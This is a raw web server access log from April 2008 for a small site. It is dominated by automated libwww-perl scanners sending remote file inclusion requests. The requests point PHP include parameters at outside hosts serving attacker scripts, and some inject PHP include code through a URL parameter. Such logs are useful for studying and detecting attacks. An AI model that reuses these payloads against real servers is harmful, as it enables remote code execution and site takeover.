195.74.37.170 - - [29/Apr/2008:11:06:43 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:11:06:43 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:11:06:44 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:11:06:44 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:11:06:49 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:11:06:49 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:11:06:55 -0700] "GET /logs/access_080201.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:11:06:57 -0700] "GET /logs/access_080201.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:11:07:00 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:11:07:01 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:11:07:01 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:11:07:07 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:11:07:15 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:11:07:15 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:11:07:15 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:11:07:20 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:11:07:20 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:11:07:20 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:07:30 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:11:07:32 -0700] "GET /logs/access_080329.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.237.22 - - [29/Apr/2008:11:08:14 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:08:19 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:08:19 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:08:19 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:08:20 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:08:24 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:08:29 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:11:08:32 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:11:08:33 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:08:38 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:11:08:54 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:11:09:06 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:11:09:08 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:11:09:13 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.95 - - [29/Apr/2008:11:09:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.95 - - [29/Apr/2008:11:09:15 -0700] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:11:09:16 -0700] "GET /logs/index.php?url=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:11:09:16 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:11:09:17 -0700] "GET /logs/access_080115.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:11:09:21 -0700] "GET /index.php?url=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
82.210.31.3 - - [29/Apr/2008:11:09:23 -0700] "GET /logs/index.php?choix=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.23.237.236 - - [29/Apr/2008:11:09:24 -0700] "GET /logs/index.php?go=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.210.31.3 - - [29/Apr/2008:11:09:30 -0700] "GET /index.php?choix=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
203.23.237.236 - - [29/Apr/2008:11:09:32 -0700] "GET /index.php?go=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:09:33 -0700] "GET /logs/index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:09:33 -0700] "GET /index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.94 - - [29/Apr/2008:11:09:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.27.50 - - [29/Apr/2008:11:09:55 -0700] "GET /logs/access_071014.log HTTP/1.0" 200 26799 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:11:09:55 -0700] "GET /logs/index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:11:09:55 -0700] "GET /index1.php?site=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:09:55 -0700] "GET /logs/index.php?go=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.154 - - [29/Apr/2008:11:10:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.118 - - [29/Apr/2008:11:10:01 -0700] "GET /bikes/dteel/2008_01_26/?D=A HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:10:01 -0700] "GET /index.php?go=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:11:10:03 -0700] "GET /logs/index.php?go=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:11:10:09 -0700] "GET /index.php?go=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:11:10:29 -0700] "GET /logs/access_080121.log/cyberfolio/portfolio/msg/view.php?av=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.208.240 - - [29/Apr/2008:11:10:41 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.togosite.com/auction/phpAdsNew/readme.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:10:51 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [29/Apr/2008:11:10:58 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [29/Apr/2008:11:10:58 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:11:10 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:11:16 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:11:37 -0700] "GET /logs/index.php?go=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:11:40 -0700] "GET /index.php?go=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:11:41 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:11:41 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:12:00 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:12:00 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:12:07 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:12:18 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:11:12:34 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:11:12:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:11:12:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:12:47 -0700] "GET /logs/index.php?go=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.245 - - [29/Apr/2008:11:12:49 -0700] "GET /minamijewelry/html/flower.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:12:51 -0700] "GET /index.php?go=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:11:12:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:11:12:55 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:11:12:55 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:11:12:55 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:11:13:02 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:11:13:03 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:13:05 -0700] "GET /logs/access.log//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:13:06 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:13:09 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:11:13:32 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:11:13:36 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:13:36 -0700] "GET /logs/access.log//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:11:13:36 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.810" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:13:37 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:13:37 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:11:13:44 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:11:13:50 -0700] "GET //modules/Forums/admin/errors.php?error=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:11:13:50 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:11:14:02 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:11:14:18 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:11:14:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:11:14:18 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [29/Apr/2008:11:14:31 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [29/Apr/2008:11:14:31 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [29/Apr/2008:11:14:31 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:14:37 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:14:37 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:11:15:05 -0700] "GET /logs/access_080204.log/admin/addons/archive/archive.php?adminfolder=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:11:15:06 -0700] "GET /admin/addons/archive/archive.php?adminfolder=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:11:15:06 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:11:15:06 -0700] "GET /logs/admin/addons/archive/archive.php?adminfolder=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:11:15:06 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:15:20 -0700] "GET /logs/forum.php?act=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:15:21 -0700] "GET /logs/forum.php?act=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:15:21 -0700] "GET /forum.php?act=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:15:21 -0700] "GET /forum.php?act=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.84.2 - - [29/Apr/2008:11:15:59 -0700] "GET /logs/access_080215.log/errors.php?error=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:11:16:02 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:11:16:07 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:11:16:07 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.227.208.240 - - [29/Apr/2008:11:16:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.togosite.com/auction/phpAdsNew/readme.txt?????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:16:30 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
